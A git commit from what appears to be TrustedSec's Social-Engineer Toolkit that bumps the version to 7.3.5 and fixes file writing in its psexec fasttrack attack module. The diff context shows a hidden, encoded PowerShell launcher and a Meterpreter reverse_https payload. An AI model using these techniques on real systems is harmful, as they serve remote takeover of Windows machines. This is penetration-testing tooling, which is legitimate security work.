psexec fix

This commit is contained in:
TrustedSec 2016-08-01 15:37:01 -04:00
parent 80fe5c0096
commit 59ad7dd8dc
3 changed files with 11 additions and 3 deletions

View file

@ -1,3 +1,9 @@
~~~~~~~~~~~~~~~~
version 7.3.5
~~~~~~~~~~~~~~~~
* fixed an issue that would cause psexec fasttrack to not properly work based on with open
~~~~~~~~~~~~~~~~
version 7.3.4
~~~~~~~~~~~~~~~~

View file

@ -1 +1 @@
7.3.4
7.3.5

View file

@ -87,8 +87,10 @@ try:
x86 = fileopen.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
filewrite.write(x86)
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
#with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
filewrite.write(x86)
filewrite.close()
payload = "windows/meterpreter/reverse_https\n" # if we are using x86
command = x86 # assign powershell to command